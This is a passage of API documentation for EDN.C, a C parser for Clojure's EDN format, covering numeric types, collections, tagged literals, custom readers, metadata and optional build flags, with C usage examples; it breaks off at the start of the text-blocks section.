const char *edn_bigint_get(const edn_value_t *value, size_t *length,
                           bool *negative, uint8_t *radix);

Get big integer digit string for use with external libraries (GMP, OpenSSL BIGNUM, etc.).

Parameters:

  • value : EDN big integer value
  • length : Output for digit string length (may be NULL)
  • negative : Output for sign flag (may be NULL)
  • radix : Output for number base: 10, 16, 8, or 2 (may be NULL)

Returns: Digit string, or NULL if not a big integer.

Clojure Compatibility: The N suffix forces BigInt for base-10 integers.

  • 42N → BigInt "42" (forced BigInt even though it fits in int64)
  • 999999999999999999999999999 → BigInt (overflow detection)
  • 0xDEADBEEFN → Long (N is hex digit, not suffix)

Example:

// BigInt from overflow
edn_result_t r = edn_read("999999999999999999999999999", 0);
size_t len;
bool neg;
uint8_t radix;
const char *digits = edn_bigint_get(r.value, &len, &neg, &radix);
if (digits) {
    printf("%s%.*s (base %d)\n", neg ? "-" : "", (int)len, digits, radix);
}
edn_free(r.value);

// BigInt with N suffix
edn_result_t r2 = edn_read("42N", 0);
digits = edn_bigint_get(r2.value, &len, &neg, &radix);
// digits = "42", len = 2, use with GMP: mpz_set_str(bigint, digits, radix)
edn_free(r2.value);

Floating Point

bool edn_double_get(const edn_value_t *value, double *out);

Get double value. Returns true if value is EDN_TYPE_FLOAT , false otherwise.

bool edn_number_as_double(const edn_value_t *value, double *out);

Convert any numeric type (INT, BIGINT, FLOAT, BIGDEC) to double. May lose precision for large numbers.

Example:

edn_result_t r = edn_read("3.14159", 0);
double num;
if (edn_double_get(r.value, &num)) {
    printf("Pi: %.5f\n", num);
}
edn_free(r.value);
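
edn_number_as_double() is handy when only an approximate double is needed regardless of how the number was written (a sketch; note the precision loss for very large values):

// Works for INT, BIGINT, FLOAT, and BIGDEC values alike
edn_result_t r = edn_read("123456789012345678901234567890", 0);  // overflows int64, parsed as BigInt

double approx;
if (edn_number_as_double(r.value, &approx)) {
    printf("approximately %g\n", approx);  // precision is lost for numbers this large
}
edn_free(r.value);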

Big Decimals

const char *edn_bigdec_get(const edn_value_t *value, size_t *length, bool *negative);

Get big decimal string for use with external libraries (Java BigDecimal, Python Decimal, etc.).

Parameters:

  • value : EDN big decimal value
  • length : Output for string length (may be NULL)
  • negative : Output for sign flag (may be NULL)

Returns: Decimal string, or NULL if not a big decimal.

Clojure Compatibility: The M suffix forces exact precision decimal representation.

  • 42M → BigDecimal "42" (integer with M suffix)
  • 3.14M → BigDecimal "3.14"
  • 1.5e10M → BigDecimal "1.5e10"

Example:

// BigDecimal from float
edn_result_t r1 = edn_read("3.14159265358979323846M", 0);
size_t len;
bool neg;
const char *decimal = edn_bigdec_get(r1.value, &len, &neg);
if (decimal) {
    printf("%s%.*s\n", neg ? "-" : "", (int)len, decimal);
    // Use with: Java BigDecimal(decimal), Python Decimal(decimal), etc.
}
edn_free(r1.value);

// BigDecimal from integer with M suffix
edn_result_t r2 = edn_read("42M", 0);
decimal = edn_bigdec_get(r2.value, &len, &neg);
// decimal = "42", application can convert to BigDecimal
edn_free(r2.value);

Ratio Numbers

bool edn_ratio_get(const edn_value_t *value, int64_t *numerator, int64_t *denominator);

Get ratio numerator and denominator. Returns true if value is EDN_TYPE_RATIO , false otherwise.

Parameters:

  • value : EDN ratio value
  • numerator : Output for numerator (may be NULL)
  • denominator : Output for denominator (may be NULL)

Returns: true if value is a ratio, false otherwise.

Clojure Compatibility: Ratios represent exact rational numbers as numerator/denominator pairs.

  • 22/7 → Ratio with numerator=22, denominator=7
  • -3/4 → Ratio with numerator=-3, denominator=4 (negative numerator)
  • 1/2 → Ratio with numerator=1, denominator=2
  • 3/6 → Automatically reduced to ratio 1/2
  • 10/5 → Automatically reduced to integer 2 (ratios with denominator 1 become integers)
  • 0/5 → Returns integer 0 (zero numerator always becomes integer 0)
  • 0777/3 → Returns 777/2
  • 0777/0777 → Returns 1

Automatic Reduction: Ratios are automatically reduced to lowest terms using the Binary GCD algorithm (Stein's algorithm):

  • 6/9 → Reduced to 2/3
  • 100/25 → Reduced to 4/1 → Returns as integer 4

Restrictions:

  • Only decimal (base-10) integers supported for both numerator and denominator
  • Integers with leading zeros (octal-looking, e.g. 0777 ) are accepted for compatibility with Clojure, which incorrectly interprets them as decimal integers with leading zeros
  • Both numerator and denominator must fit in int64_t
  • Denominator must be positive (negative denominators are rejected)
  • Denominator cannot be zero
  • No whitespace allowed around /
  • Hex and binary notations not supported for ratios

Example:

// Parse ratio
edn_result_t r = edn_read("22/7", 0);

if (r.error == EDN_OK && edn_type(r.value) == EDN_TYPE_RATIO) {
    int64_t num, den;
    edn_ratio_get(r.value, &num, &den);
    printf("Ratio: %lld/%lld\n", (long long)num, (long long)den);
    // Output: Ratio: 22/7

    // Convert to double for approximation
    double approx;
    edn_number_as_double(r.value, &approx);
    printf("Approximation: %.10f\n", approx);
    // Output: Approximation: 3.1428571429
}

edn_free(r.value);

// Automatic reduction
edn_result_t r2 = edn_read("3/6", 0);
int64_t num2, den2;
edn_ratio_get(r2.value, &num2, &den2);
// num2 = 1, den2 = 2 (reduced from 3/6)
edn_free(r2.value);

// Reduction to integer
edn_result_t r3 = edn_read("10/5", 0);
assert(edn_type(r3.value) == EDN_TYPE_INT);
int64_t int_val;
edn_int64_get(r3.value, &int_val);
// int_val = 2 (10/5 reduced to 2/1, returned as integer)
edn_free(r3.value);

// Negative ratios
edn_result_t r4 = edn_read("-3/4", 0);
int64_t num4, den4;
edn_ratio_get(r4.value, &num4, &den4);
// num4 = -3, den4 = 4 (numerator is negative, denominator is positive)
edn_free(r4.value);

// Error: zero denominator
edn_result_t r5 = edn_read("5/0", 0);
// r5.error == EDN_ERROR_INVALID_NUMBER
// r5.error_message == "Ratio denominator cannot be zero"

// Error: negative denominator (denominators must be positive)
edn_result_t r6 = edn_read("3/-4", 0);
// r6.error == EDN_ERROR_INVALID_NUMBER
// r6.error_message == "Ratio denominator must be positive"

// Error: hex not supported
edn_result_t r7 = edn_read("0x10/2", 0);
// Parses 0x10 as int, not as ratio

Build Configuration:

This feature is disabled by default. To enable it:

Make:

make RATIO=1

CMake:

cmake -DEDN_ENABLE_RATIO=ON ..
make

When disabled (default):

  • EDN_TYPE_RATIO enum value is not available
  • edn_ratio_get() function is not available

Note: Ratios are a Clojure language feature, not part of the official EDN specification. They're provided here for compatibility with Clojure's clojure.edn parser.

See test/test_numbers.c for comprehensive ratio test examples.

Extended Integer Formats

EDN.C supports Clojure-style special integer formats for hexadecimal, octal, binary, and arbitrary radix numbers. These are disabled by default as they are not part of the base EDN specification.

Supported formats:

  • Hexadecimal : 0xFF , 0x2A , -0x10 (base-16, prefix 0x or 0X )
  • Octal : 0777 , 052 , -0123 (base-8, leading zero followed by 0-7 )
  • Binary : 2r1010 , -2r1111 (base-2, radix notation)
  • Arbitrary radix : 8r77 , 16rFF , 36rZZ (bases 2-36, radix notation NrDDDD )

Examples:

// Hexadecimal
edn_result_t r1 = edn_read("0xFF", 0);
int64_t val1;
edn_int64_get(r1.value, &val1);
// val1 = 255
edn_free(r1.value);

// Octal
edn_result_t r2 = edn_read("0777", 0);
int64_t val2;
edn_int64_get(r2.value, &val2);
// val2 = 511 (7*64 + 7*8 + 7)
edn_free(r2.value);

// Binary (radix notation)
edn_result_t r3 = edn_read("2r1010", 0);
int64_t val3;
edn_int64_get(r3.value, &val3);
// val3 = 10
edn_free(r3.value);

// Base-36 (radix notation)
edn_result_t r4 = edn_read("36rZZ", 0);
int64_t val4;
edn_int64_get(r4.value, &val4);
// val4 = 1295 (35*36 + 35)
edn_free(r4.value);

// Negative hex
edn_result_t r5 = edn_read("-0x10", 0);
int64_t val5;
edn_int64_get(r5.value, &val5);
// val5 = -16
edn_free(r5.value);

Radix notation: NrDDDD where:

  • N is the radix (base) from 2 to 36
  • r is the radix separator
  • DDDD are the digits (0-9, A-Z, case-insensitive for bases > 10)

Build Configuration:

This feature is disabled by default. To enable it:

Make:

make EXTENDED_INTEGERS=1

CMake:

cmake -DEDN_ENABLE_EXTENDED_INTEGERS=ON ..
make

When disabled (default):

  • Hexadecimal ( 0xFF ), binary ( 2r1010 ), and radix notation ( 36rZZ ) will fail to parse
  • Leading zeros are forbidden : Numbers like 01 , 0123 , 0777 are rejected (per EDN spec)
  • Only 0 itself, or 0.5 , 0e10 (floats starting with zero) are allowed

Note: Extended integer formats are a Clojure language feature, not part of the official EDN specification. They're provided here for compatibility with Clojure's reader.

See test/test_numbers.c for comprehensive extended integer format test examples.

Underscore in Numeric Literals

EDN.C supports underscores as visual separators in numeric literals for improved readability. This feature is disabled by default as it's not part of the base EDN specification.

Supported number types:

  • Integers : 1_000 , 1_000_000 , 4____2 → 1000 , 1000000 , 42
  • Floats : 3.14_15_92 , 1_234.56_78 → 3.141592 , 1234.5678
  • Scientific notation : 1_500e10 , 1.5e1_0 , 1_5.2_5e1_0 → 1500e10 , 1.5e10 , 15.25e10
  • BigInt : 1_234_567_890_123_456_789N
  • BigDecimal : 1_234.56_78M , 1_5.2_5e1_0M
  • Hexadecimal (with EXTENDED_INTEGERS=1 ): 0xDE_AD_BE_EF → 0xDEADBEEF
  • Octal (with EXTENDED_INTEGERS=1 ): 07_77 → 0777
  • Binary (with EXTENDED_INTEGERS=1 ): 2r1010_1010 → 170
  • Radix notation (with EXTENDED_INTEGERS=1 ): 36rZ_Z → 1295

Rules:

  • Underscores are only allowed between digits (not at start, end, or adjacent to special characters)
  • Multiple consecutive underscores are allowed: 4____2 is valid
  • Not allowed adjacent to decimal point: 123_.5 or 123._5 are invalid
  • Not allowed before/after exponent marker: 123_e10 or 123e_10 are invalid
  • Not allowed before suffix: 123_N or 123.45_M are invalid
  • Works with negative numbers: -1_234 → -1234

Examples:

// Credit card number formatting
edn_result_t r1 = edn_read("1234_5678_9012_3456", 0);
int64_t val1;
edn_int64_get(r1.value, &val1);
// val1 = 1234567890123456
edn_free(r1.value);

// Pi with digit grouping
edn_result_t r2 = edn_read("3.14_15_92_65_35_89_79", 0);
double val2;
edn_double_get(r2.value, &val2);
// val2 = 3.141592653589793
edn_free(r2.value);

// Hex bytes (requires EXTENDED_INTEGERS=1)
edn_result_t r3 = edn_read("0xFF_EC_DE_5E", 0);
int64_t val3;
edn_int64_get(r3.value, &val3);
// val3 = 0xFFECDE5E
edn_free(r3.value);

// Large numbers with thousands separators
edn_result_t r4 = edn_read("1_000_000", 0);
int64_t val4;
edn_int64_get(r4.value, &val4);
// val4 = 1000000
edn_free(r4.value);

// In collections
edn_result_t r5 = edn_read("[1_000 2_000 3_000]", 0);
// Three integers: 1000, 2000, 3000
edn_free(r5.value);

Invalid examples:

// Underscore at start - parses as symbol
edn_read("_123", 0);  // Symbol, not number

// Underscore at end
edn_read("123_", 0);  // Error: EDN_ERROR_INVALID_NUMBER

// Adjacent to decimal point
edn_read("123_.5", 0);   // Error: EDN_ERROR_INVALID_NUMBER
edn_read("123._5", 0);   // Error: EDN_ERROR_INVALID_NUMBER

// Before/after exponent marker
edn_read("123_e10", 0);  // Error: EDN_ERROR_INVALID_NUMBER
edn_read("123e_10", 0);  // Error: EDN_ERROR_INVALID_NUMBER

// Before suffix
edn_read("123_N", 0);    // Error: EDN_ERROR_INVALID_NUMBER
edn_read("123.45_M", 0); // Error: EDN_ERROR_INVALID_NUMBER

Build Configuration:

This feature is disabled by default. To enable it:

Make:

make UNDERSCORE_IN_NUMERIC=1

CMake:

cmake -DEDN_ENABLE_UNDERSCORE_IN_NUMERIC=ON ..
make

Combined with other features:

# Enable underscores with extended integers and ratios
make UNDERSCORE_IN_NUMERIC=1 EXTENDED_INTEGERS=1 RATIO=1

When disabled (default):

  • Numbers with underscores will fail to parse
  • The scanner will stop at the first underscore, treating it as an invalid number

Note: Underscores in numeric literals are a common feature in modern programming languages (Java, Rust, Python 3.6+, etc.) but are not part of the official EDN specification. This feature is provided for convenience and readability.

See test/test_underscore_numeric.c for comprehensive test examples.

Characters

bool edn_character_get(const edn_value_t *value, uint32_t *out);

Get Unicode codepoint. Returns true if value is EDN_TYPE_CHARACTER , false otherwise.

Example:

// Named characters: \newline, \tab, \space, \return
edn_result_t r1 = edn_read("\\newline", 0);
uint32_t cp1;
edn_character_get(r1.value, &cp1);  // cp1 = 0x0A

// Unicode: \uXXXX or literal character
edn_result_t r2 = edn_read("\\u03B1", 0);  // Greek alpha
uint32_t cp2;
edn_character_get(r2.value, &cp2);  // cp2 = 0x03B1

edn_free(r1.value);
edn_free(r2.value);

Type Predicates

Convenience functions for type checking:

bool edn_is_nil(const edn_value_t *value);
bool edn_is_string(const edn_value_t *value);
bool edn_is_number(const edn_value_t *value);
bool edn_is_integer(const edn_value_t *value);
bool edn_is_collection(const edn_value_t *value);

Type predicate details:

  • edn_is_nil() - Returns true for EDN_TYPE_NIL
  • edn_is_string() - Returns true for EDN_TYPE_STRING
  • edn_is_number() - Returns true for any numeric type (INT, BIGINT, FLOAT, BIGDEC, RATIO)
  • edn_is_integer() - Returns true for integer types (INT, BIGINT)
  • edn_is_collection() - Returns true for collections (LIST, VECTOR, MAP, SET)

Example:

edn_result_t r = edn_read("[42 \"hello\" [1 2] {:a 1}]", 0);

if (edn_is_collection(r.value)) {
    for (size_t i = 0; i < edn_vector_count(r.value); i++) {
        edn_value_t* elem = edn_vector_get(r.value, i);

        if (edn_is_number(elem)) {
            printf("Found number\n");
        } else if (edn_is_string(elem)) {
            printf("Found string\n");
        } else if (edn_is_collection(elem)) {
            printf("Found nested collection\n");
        }
    }
}

edn_free(r.value);

String Utilities

bool edn_string_equals(const edn_value_t *value, const char *str);

Compare EDN string with C string for equality. Returns true if equal, false otherwise.

Example:

edn_result_t r = edn_read("{:status \"active\"}", 0);
edn_value_t* status = edn_map_get_keyword(r.value, "status");

if (edn_string_equals(status, "active")) {
    printf("Status is active\n");
}

edn_free(r.value);

Symbols

bool edn_symbol_get(const edn_value_t *value,
                    const char **namespace, size_t *ns_length,
                    const char **name, size_t *name_length);

Get symbol components. Returns true if value is EDN_TYPE_SYMBOL , false otherwise.

Example:

// Simple symbol
edn_result_t r1 = edn_read("foo", 0);
const char *name;
size_t name_len;
edn_symbol_get(r1.value, NULL, NULL, &name, &name_len);
printf("Symbol: %.*s\n", (int)name_len, name);

// Namespaced symbol
edn_result_t r2 = edn_read("clojure.core/map", 0);
const char *ns, *n;
size_t ns_len, n_len;
edn_symbol_get(r2.value, &ns, &ns_len, &n, &n_len);
printf("Symbol: %.*s/%.*s\n", (int)ns_len, ns, (int)n_len, n);

edn_free(r1.value);
edn_free(r2.value);

Keywords

bool edn_keyword_get(const edn_value_t *value,
                     const char **namespace, size_t *ns_length,
                     const char **name, size_t *name_length);

Get keyword components. Returns true if value is EDN_TYPE_KEYWORD , false otherwise.

Example:

edn_result_t r = edn_read(":name", 0);
const char *name;
size_t name_len;
edn_keyword_get(r.value, NULL, NULL, &name, &name_len);
printf("Keyword: :%.*s\n", (int)name_len, name);
edn_free(r.value);

Collections

Lists

Ordered sequences: (1 2 3)

size_t edn_list_count(const edn_value_t *value);
edn_value_t *edn_list_get(const edn_value_t *value, size_t index);

Example:

edn_result_t r = edn_read("(1 2 3)", 0);
size_t count = edn_list_count(r.value);

for (size_t i = 0; i < count; i++) {
    edn_value_t *elem = edn_list_get(r.value, i);
    int64_t num;
    if (edn_int64_get(elem, &num)) {
        printf("%lld ", (long long)num);
    }
}
printf("\n");
edn_free(r.value);

Vectors

Indexed sequences: [1 2 3]

size_t edn_vector_count(const edn_value_t *value);
edn_value_t *edn_vector_get(const edn_value_t *value, size_t index);

Example:

edn_result_t r = edn_read("[\"a\" \"b\" \"c\"]", 0);
size_t count = edn_vector_count(r.value);

for (size_t i = 0; i < count; i++) {
    edn_value_t *elem = edn_vector_get(r.value, i);
    size_t len;
    const char *str = edn_string_get(elem, &len);
    printf("[%zu] = %.*s\n", i, (int)len, str);
}
edn_free(r.value);

Sets

Unique elements: #{:a :b :c}

size_t edn_set_count(const edn_value_t *value);
edn_value_t *edn_set_get(const edn_value_t *value, size_t index);
bool edn_set_contains(const edn_value_t *value, const edn_value_t *element);

Note: Sets reject duplicate elements during parsing. Iteration order is implementation-defined.

Example:

edn_result_t r = edn_read("#{:a :b :c}", 0);
printf("Set has %zu elements\n", edn_set_count(r.value));

edn_result_t key = edn_read(":a", 0);
if (edn_set_contains(r.value, key.value)) {
    printf(":a is in set\n");
}

edn_free(key.value);
edn_free(r.value);

Maps

Key-value pairs: {:foo 1 :bar 2}

size_t edn_map_count(const edn_value_t *value);
edn_value_t *edn_map_get_key(const edn_value_t *value, size_t index);
edn_value_t *edn_map_get_value(const edn_value_t *value, size_t index);
edn_value_t *edn_map_lookup(const edn_value_t *value, const edn_value_t *key);
bool edn_map_contains_key(const edn_value_t *value, const edn_value_t *key);

Note: Maps reject duplicate keys during parsing. Iteration order is implementation-defined.

Example:

edn_result_t r = edn_read("{:name \"Alice\" :age 30}", 0);

// Iterate over all entries
size_t count = edn_map_count(r.value);
for (size_t i = 0; i < count; i++) {
    edn_value_t *key = edn_map_get_key(r.value, i);
    edn_value_t *val = edn_map_get_value(r.value, i);
    
    const char *key_name;
    size_t key_len;
    edn_keyword_get(key, NULL, NULL, &key_name, &key_len);
    printf(":%.*s => ", (int)key_len, key_name);
    
    if (edn_type(val) == EDN_TYPE_STRING) {
        size_t val_len;
        const char *str = edn_string_get(val, &val_len);
        printf("\"%.*s\"\n", (int)val_len, str);
    } else if (edn_type(val) == EDN_TYPE_INT) {
        int64_t num;
        edn_int64_get(val, &num);
        printf("%lld\n", (long long)num);
    }
}

// Lookup by key
edn_result_t key = edn_read(":name", 0);
edn_value_t *name = edn_map_lookup(r.value, key.value);
if (name != NULL) {
    size_t len;
    const char *str = edn_string_get(name, &len);
    printf("Name: %.*s\n", (int)len, str);
}

edn_free(key.value);
edn_free(r.value);

Map Convenience Functions:

edn_value_t *edn_map_get_keyword(const edn_value_t *map, const char *keyword);
edn_value_t *edn_map_get_namespaced_keyword(const edn_value_t *map, const char *namespace, const char *name);
edn_value_t *edn_map_get_string_key(const edn_value_t *map, const char *key);

Convenience wrappers that simplify common map lookup patterns by creating the key internally.

Example:

edn_result_t r = edn_read("{:name \"Alice\" :family/name \"Black\" :age 30 \"config\" true}", 0);

// Keyword lookup
edn_value_t* name = edn_map_get_keyword(r.value, "name");
if (name && edn_is_string(name)) {
    // name is "Alice"
}

// Namespaced keyword lookup
edn_value_t* family_name = edn_map_get_namespaced_keyword(r.value, "family", "name");
if (family_name && edn_is_string(family_name)) {
    // family_name is "Black"
}

// String key lookup
edn_value_t* config = edn_map_get_string_key(r.value, "config");
if (config) {
    bool val;
    edn_bool_get(config, &val);  // val is true
}

edn_free(r.value);

Tagged Literals

Tagged literals provide extensibility: #tag value

Basic Tagged Literal Access

bool edn_tagged_get(const edn_value_t *value,
                    const char **tag, size_t *tag_length,
                    edn_value_t **tagged_value);

Example:

edn_result_t r = edn_read("#inst \"2024-01-01T00:00:00Z\"", 0);

const char *tag;
size_t tag_len;
edn_value_t *wrapped;

if (edn_tagged_get(r.value, &tag, &tag_len, &wrapped)) {
    printf("Tag: %.*s\n", (int)tag_len, tag);
    
    size_t str_len;
    const char *str = edn_string_get(wrapped, &str_len);
    printf("Value: %.*s\n", (int)str_len, str);
}

edn_free(r.value);

Custom Readers

Transform tagged literals during parsing with custom reader functions.

Reader Registry Functions

// Create and destroy registry
edn_reader_registry_t *edn_reader_registry_create(void);
void edn_reader_registry_destroy(edn_reader_registry_t *registry);

// Register/unregister readers
bool edn_reader_register(edn_reader_registry_t *registry,
                         const char *tag, edn_reader_fn reader);
void edn_reader_unregister(edn_reader_registry_t *registry, const char *tag);
edn_reader_fn edn_reader_lookup(const edn_reader_registry_t *registry,
                                const char *tag);

Reader Function Type

typedef edn_value_t *(*edn_reader_fn)(edn_value_t *value,
                                      edn_arena_t *arena,
                                      const char **error_message);

A reader function receives the wrapped value and transforms it into a new representation. On error, set error_message to a static string and return NULL.

Parse Options

typedef struct {
    edn_reader_registry_t *reader_registry;  // Optional reader registry
    edn_value_t *eof_value;                  // Optional value to return on EOF
    edn_default_reader_mode_t default_reader_mode;
} edn_parse_options_t;

edn_result_t edn_read_with_options(const char *input, size_t length,
                                    const edn_parse_options_t *options);

Parse options fields:

  • reader_registry : Optional reader registry for tagged literal transformations
  • eof_value : Optional value to return when EOF is encountered instead of an error
  • default_reader_mode : Behavior for unregistered tags (see below)

Default reader modes (see the sketch after this list):

  • EDN_DEFAULT_READER_PASSTHROUGH : Return EDN_TYPE_TAGGED for unregistered tags (default)
  • EDN_DEFAULT_READER_UNWRAP : Discard tag, return wrapped value
  • EDN_DEFAULT_READER_ERROR : Fail with EDN_ERROR_UNKNOWN_TAG
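
For example (a sketch using only edn_read_with_options and the modes above), changing the default reader mode changes what an unregistered tag produces:

edn_parse_options_t opts = {
    .reader_registry = NULL,
    .eof_value = NULL,
    .default_reader_mode = EDN_DEFAULT_READER_UNWRAP
};

// UNWRAP: the tag is discarded and the wrapped value is returned
edn_result_t r1 = edn_read_with_options("#unknown 42", 0, &opts);
// edn_type(r1.value) == EDN_TYPE_INT
edn_free(r1.value);

// ERROR: the same input fails with EDN_ERROR_UNKNOWN_TAG
opts.default_reader_mode = EDN_DEFAULT_READER_ERROR;
edn_result_t r2 = edn_read_with_options("#unknown 42", 0, &opts);
// r2.error == EDN_ERROR_UNKNOWN_TAG
edn_free(r2.value);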

EOF Value Handling:

By default, when the parser encounters end-of-file (empty input, whitespace-only input, or after #_ discard), it returns EDN_ERROR_UNEXPECTED_EOF . You can customize this behavior by providing an eof_value in the parse options:

// First, create an EOF sentinel value
edn_result_t eof_sentinel = edn_read(":eof", 0);

// Configure parse options with EOF value
edn_parse_options_t options = {
    .reader_registry = NULL,
    .eof_value = eof_sentinel.value,
    .default_reader_mode = EDN_DEFAULT_READER_PASSTHROUGH
};

// Parse input that results in EOF
edn_result_t result = edn_read_with_options("   ", 3, &options);

// Instead of EDN_ERROR_UNEXPECTED_EOF, returns EDN_OK with eof_value
if (result.error == EDN_OK) {
    // result.value == eof_sentinel.value
    const char* name;
    edn_keyword_get(result.value, NULL, NULL, &name, NULL);
    // name == "eof"
}

// Clean up
edn_free(eof_sentinel.value);

Reader Example

#include "edn.h"
#include "../src/edn_internal.h"  // For edn_arena_alloc

// Reader that uppercases keywords
static edn_value_t *upper_reader(edn_value_t *value, edn_arena_t *arena,
                                 const char **error_message) {
    if (edn_type(value) != EDN_TYPE_KEYWORD) {
        *error_message = "#upper requires keyword";
        return NULL;
    }

    const char *name;
    size_t name_len;
    edn_keyword_get(value, NULL, NULL, &name, &name_len);

    // Allocate uppercase name in arena
    char *upper = (char *)edn_arena_alloc(arena, name_len + 1);
    if (!upper) {
        *error_message = "Out of memory";
        return NULL;
    }

    for (size_t i = 0; i < name_len; i++) {
        char c = name[i];
        upper[i] = (c >= 'a' && c <= 'z') ? (c - 32) : c;
    }
    upper[name_len] = '\0';

    // Create new keyword value
    edn_value_t *result = edn_arena_alloc_value(arena);
    if (!result) {
        *error_message = "Out of memory";
        return NULL;
    }

    result->type = EDN_TYPE_KEYWORD;
    result->as.keyword.name = upper;
    result->as.keyword.name_length = name_len;
    result->as.keyword.namespace = NULL;
    result->as.keyword.ns_length = 0;
    result->arena = arena;

    return result;
}

int main(void) {
    // Create registry and register reader
    edn_reader_registry_t *registry = edn_reader_registry_create();
    edn_reader_register(registry, "upper", upper_reader);

    // Parse with custom reader
    edn_parse_options_t opts = {
        .reader_registry = registry,
        .default_reader_mode = EDN_DEFAULT_READER_PASSTHROUGH
    };

    edn_result_t r = edn_read_with_options("#upper :hello", 0, &opts);
    if (r.error == EDN_OK) {
        const char *name;
        size_t len;
        edn_keyword_get(r.value, NULL, NULL, &name, &len);
        printf(":%.*s\n", (int)len, name);  // Output: :HELLO
    }

    edn_free(r.value);
    edn_reader_registry_destroy(registry);
    return 0;
}

See examples/reader.c for more complete examples including timestamp conversion, vector extraction, and namespaced tags.

Map Namespace Syntax

EDN.C supports Clojure's map namespace syntax extension, which allows you to specify a namespace that gets automatically applied to all non-namespaced keyword keys in a map.

Syntax: #:namespace{:key1 val1 :key2 val2}

Example:

edn_result_t result = edn_read("#:person{:name \"Alice\" :age 30}", 0);
// Equivalent to: {:person/name "Alice" :person/age 30}

if (result.error == EDN_OK) {
    edn_value_t* map = result.value;
    
    // Keys are automatically namespaced
    edn_value_t* key1 = edn_map_get_key(map, 0);
    const char *ns, *name;
    size_t ns_len, name_len;
    edn_keyword_get(key1, &ns, &ns_len, &name, &name_len);
    
    printf(":%.*s/%.*s\n", (int)ns_len, ns, (int)name_len, name);
    // Output: :person/name
    
    edn_free(map);
}

Rules:

  • Both keyword and symbol keys without an existing namespace are transformed
  • Keys with existing namespaces are preserved: #:foo{:x 1 :bar/y 2} → {:foo/x 1 :bar/y 2} (see the sketch after this list)
  • Symbol keys are also namespaced: #:foo{x 1 y 2} → {foo/x 1 foo/y 2}
  • Mixed keys work correctly: #:foo{x 1 :y 2} → {foo/x 1 :foo/y 2}
  • Non-keyword/non-symbol keys are not transformed: #:foo{"x" 1 :y 2} → {"x" 1 :foo/y 2}
  • The namespace keyword cannot itself have a namespace
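
To see the preservation rule in action, here is a sketch (it assumes the library was built with MAP_NAMESPACE_SYNTAX=1 and uses only the map and keyword accessors documented above):

// "foo" is applied only to keys that do not already have a namespace
edn_result_t r = edn_read("#:foo{:x 1 :bar/y 2}", 0);

for (size_t i = 0; i < edn_map_count(r.value); i++) {
    const char *ns, *name;
    size_t ns_len, name_len;
    edn_keyword_get(edn_map_get_key(r.value, i), &ns, &ns_len, &name, &name_len);
    printf(":%.*s/%.*s\n", (int)ns_len, ns, (int)name_len, name);
    // Prints :foo/x and :bar/y (iteration order is implementation-defined)
}

edn_free(r.value);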

Build Configuration:

This feature is disabled by default. To enable it:

make MAP_NAMESPACE_SYNTAX=1

When disabled (default), #:foo{...} will fail to parse.

See examples/example_namespaced_map.c for more details.

Extended Character Literals

EDN.C supports optional extended character literal features that are disabled by default for strict EDN compliance.

Extended named characters:

  • \formfeed - Form feed control character (U+000C)
  • \backspace - Backspace control character (U+0008)

Octal escape sequences (Clojure-compatible):

  • \oN - Where N is 1-3 octal digits (0-7)
  • If \o is followed by any digit, attempts octal parsing
  • Digits 8 or 9 cause "Invalid octal escape sequence in character literal" error
  • Examples:
    • \o7 - Bell character (U+0007)
    • \o12 - Line feed (U+000A)
    • \o101 - Uppercase 'A' (U+0041)
    • \o377 - Maximum value (U+00FF / 255)
    • \o alone - Parses as character 'o'
    • \o8 - Error: Invalid octal character

Example:

edn_result_t result = edn_read("\\formfeed", 0);
if (result.error == EDN_OK) {
    uint32_t codepoint;
    edn_character_get(result.value, &codepoint);
    printf("U+%04X\n", codepoint);  // Output: U+000C
    edn_free(result.value);
}

// Octal escapes
result = edn_read("[\\o101 \\o102 \\o103]", 0);
// Parses as vector ['A', 'B', 'C']

Build Configuration:

This feature is disabled by default. To enable it:

Make:

make EXTENDED_CHARACTERS=1

CMake:

cmake -DEDN_ENABLE_EXTENDED_CHARACTERS=ON ..
make

When disabled (default):

  • \formfeed and \backspace will fail to parse
  • \oNNN will fail to parse
  • Standard character literals still work: \newline , \tab , \space , \return , \uXXXX , etc.

See examples/example_extended_characters.c for more details.

Metadata

EDN.C supports Clojure-style metadata syntax, which allows attaching metadata maps to values.

Syntax variants:

  1. Map metadata : ^{:key val} form - metadata is the map itself
  2. Keyword shorthand : ^:keyword form - expands to {:keyword true}
  3. String tag : ^"string" form - expands to {:tag "string"}
  4. Symbol tag : ^symbol form - expands to {:tag symbol}
  5. Vector param-tags : ^[type1 type2] form - expands to {:param-tags [type1 type2]}

Chaining : Multiple metadata can be chained: ^meta1 ^meta2 form - metadata maps are merged from right to left.

Example:

#include "edn.h"
#include <stdio.h>

int main(void) {
    // Parse with keyword shorthand
    edn_result_t result = edn_read("^:private my-var", 0);

    if (result.error == EDN_OK) {
        // Check if value has metadata
        if (edn_value_has_meta(result.value)) {
            edn_value_t* meta = edn_value_meta(result.value);

            // Metadata is always a map
            printf("Metadata entries: %zu\n", edn_map_count(meta));

            // Look up specific metadata key
            edn_result_t key = edn_read(":private", 0);
            edn_value_t* val = edn_map_lookup(meta, key.value);
            // val will be boolean true

            edn_free(key.value);
        }

        edn_free(result.value);
    }

    return 0;
}

More examples:

// Map metadata
edn_read("^{:doc \"A function\" :test true} my-fn", 0);

// String tag
edn_read("^\"String\" [1 2 3]", 0);
// Expands to: ^{:tag "String"} [1 2 3]

// Symbol tag
edn_read("^Vector [1 2 3]", 0);
// Expands to: ^{:tag Vector} [1 2 3]

// Vector param-tags
edn_read("^[String long _] my-fn", 0);
// Expands to: ^{:param-tags [String long _]} my-fn

// Chained metadata
edn_read("^:private ^:dynamic ^{:doc \"My var\"} x", 0);
// All metadata merged into one map

Supported value types:

Metadata can only be attached to:

  • Collections: lists, vectors, maps, sets
  • Tagged literals
  • Symbols

Note: Metadata cannot be attached to scalar values (nil, booleans, numbers, strings, keywords).

API:

// Check if value has metadata
bool edn_value_has_meta(const edn_value_t* value);

// Get metadata map (returns NULL if no metadata)
edn_value_t* edn_value_meta(const edn_value_t* value);

Build Configuration:

This feature is disabled by default. To enable it:

Make:

make METADATA=1

CMake:

cmake -DEDN_ENABLE_METADATA=ON ..
make

When disabled (default):

  • ^ is treated as a valid character in identifiers (symbols/keywords)
  • ^test parses as a symbol named "^test"
  • Metadata API functions are not available

Note: Metadata is a Clojure language feature, not part of the official EDN specification. It's provided here for compatibility with Clojure's reader.

See examples/example_metadata.c for more details.

Text Blocks

Experimental feature that adds Java-style multi-line text blocks with automatic indentation stripping to EDN. Requires EDN_ENABLE_TEXT_BLOCKS compilation flag (disabled by default).

Text blocks start with three double quotes followed by a newline ( """\n ) and end with three double quotes ( """ ):

